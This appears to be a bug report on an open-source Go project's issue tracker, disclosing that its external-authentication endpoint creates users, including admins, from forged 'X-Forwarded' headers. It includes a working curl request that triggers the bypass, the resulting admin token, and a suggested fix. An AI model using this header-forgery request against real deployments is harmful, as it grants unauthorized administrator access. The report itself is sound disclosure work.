External Authentication is not fully implemented #148
Description
Checking the code for external auth, it is clear that user creation is only based on some "X-Forwarded-..." Headers.
By setting the env variable AUTH_EXTERNAL_ENABLED=true, and sending a request with all the necessary headers, it is possible to make the backend create an admin user from scratch, without any external login URL check:
curl -X POST http://localhost:4000/api/v2/authenticate/external \
-H 'X-Forwarded-User:someuser' -H 'X-Forwarded-Email:dummy@dum.dm' \
-H 'X-Forwarded-Groups:admin'
One then gets the response:
{"message":"Authenticated","success":true,"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Miwicm9sZSI6IkFkbWluIiwiZXhwIjoxNzU3NDk3MDUyLCJpYXQiOjE3NTY4OTIyNTIsImlzcyI6Imh0dHA6Ly93ZWIudmlsbGFzLmZlaW4tYWFjaGVuLm9yZy8ifQ.NXnuQ1Y9t222pUbWL3F4wBlMdKo5xjagaQpVBihY5V8","user":{"id":2,"createdAt":"2025-09-03T09:37:32.917927467Z","updatedAt":"2025-09-03T09:37:32.917927467Z","username":"someuser","mail":"dummy@dum.dm","role":"Admin","active":true}}
I am guessing the most (golang) idiomatic way to implement this, for a modular Identity Provider, is to have a params/body/header mapper , that takes forwarded data , maps to a proper payload ( according to whatever configured external auth service ), and attempts to login using the payload.
If the login works, the user gets a redirect to a context where they get a token of some sorts ( or an account )